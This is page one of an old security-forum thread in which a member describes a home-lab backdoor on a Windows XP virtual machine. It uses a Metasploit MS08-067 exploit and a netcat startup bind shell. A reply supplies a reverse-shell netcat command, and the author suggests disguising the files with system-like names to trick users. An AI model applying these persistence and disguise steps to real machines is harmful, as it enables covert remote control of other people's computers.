Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: My first backdoor in Windows xp sp2 home edition

  1. #1
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default My first backdoor in Windows xp sp2 home edition

    I manage to do my first backdoor.

    Lab: Attacker: dell laptop inspirion 1525 usb Backtrack4 prefinal

    Victim: virtual box Windows xp sp2 home edition under linux ubuntu 9.04 .


    I think these steps are easy so anyone who start working wit Bt as i start few months ago can try this to see in general how persistent backdoor works.

    First i run metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.

    After i get active session first i disable firewall with Carlos Perez script.

    Then i uplod file nc.exe in C:/ (or any directory you want) and batch file with name test.bat which i previously made in notepad runed in wine which i upload in startup folder of victim machine.

    Test.bat had this in file: start C:\nc.exe -L -p 5555 -d -e cmd.exe.

    After i do this and reboot machine my backdoor always listen on port 5555 (or you can put someother port) and everytime machine start you can see i one second black cmd screen which start listener on port 5555.

    Then just type on Attack machine: nc (ip of target) 5555 and you will get reverse shell.

    Its far from ideal backdoor and has many drawbacks but i think its nice way to start to see how backdoors work in general.

    If someone has any sugesstions (i didnt manage to bypass firewall without disable it with ruby script first) or something like that or someone how will try this can ask me here and i will help him to make same thing as me?

  2. #2
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    You can open a port for nc instead of disabling the firewall.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Just to correct you (congratulations on your first one by the way), but that is not a reverse shell.

    If the test.bat ran:
    Code:
    nc -nw 10 -d 192.168.1.2 5555 -e cmd.exe
    That would make it a reverse shell. As it is you have yourself a bind shell.

    Incidentally infinitely easier to work with reverse shells as you don't get the "Windows is Unprotected" rubbish from the Security Center (unless, of course, you disable the security center, which may or may not be noticed by the user).
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Yes sorry i mean bind shell i was fast when i write post.

    Yes ofcourse drawback is that it may be noticed by user i have many new ideas with better things i just made this to see how it works and for some other not so expirienced users to start with that because it is easy and nice way to start work with backdoors.

    I think that this backdoor will not work in Vista because as i remember (i must put Vista on VM) start up folder is hidden.

    I think in Vista you must do something with registry.

  5. #5
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Also we can use some sort of social engineering.

    We can for example nc.exe rename it to system.exe all to some file similar to some files from windows system.

    Also we can bat file call it not test but winlog.bat for example.

    How this can help us: For example we do backdoor like i do my backdoor and on victim machine pop up message that firewall is turned off after next reboot.

    Ofcourse victim turn it on again.Then reboot computer or turn it off. Next time when he boot his windows on the start it will say that windows firewall block program (nc.exe which we put in start up menu) but it will not say that it blocks nc.exe it will say that it block for example system.exe and i think any ordinary user will put unblock because he will think that it is something connecting with system and he will unblock it. And we have our bind shell in peace.

    What you think about that Gitsnik?

    Also can we somehow edit in reg with meterpreter that this icon when firewall is off dosent pop out?

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the windows firewall is the only one in use.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by Gitsnik View Post
    Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the windows firewall is the only one in use.
    I told you...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by kazalku View Post
    I told you...
    No what you did is provide a new guy a far-too-broad interpretation of what to do. Most people don't even know they can control the networking services from the command line.

    I am all for not baby sitting, but even I have to concede some information is hard won.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  9. #9
    Junior Member
    Join Date
    Aug 2007
    Posts
    85

    Default

    Most people don't even know they can control the networking services from the command line.
    , i was one of them . But after i read Ed Skoudis Command Line Kung Fu every thing become clear for me .

    blog = Command Line Kung Fu

    also there is Pdf version .
    How you spend your time is more important than how you spend your money. Money mistakes can be corrected, but time is gone forever. David Norris

  10. #10
    Just burned his ISO PeterPunk's Avatar
    Join Date
    Jul 2009
    Posts
    9

    Default

    Quote Originally Posted by Handsome-geek View Post

    Victim: virtual box Windows xp sp2 home edition under linux ubuntu 9.04 .


    I think these steps are easy so anyone who start working wit Bt as i start few months ago can try this to see in general how persistent backdoor works.

    First i run metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.

    After i get active session ...first i disable firewall with Carlos Perez script.
    ...
    Sorry but... how do you get an active session with windows firewall on?

    I try exactly the same scenario in a Victim: virtual box Windows xp sp2 Pro edition under Vista Home Premium and I cannot get an active session unless I disable the windows XP firewall.

    Is something that I am missing?
    Is there any case that the firewall in XP Professional edition has different behavior from Home edition ?

    Thnx

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •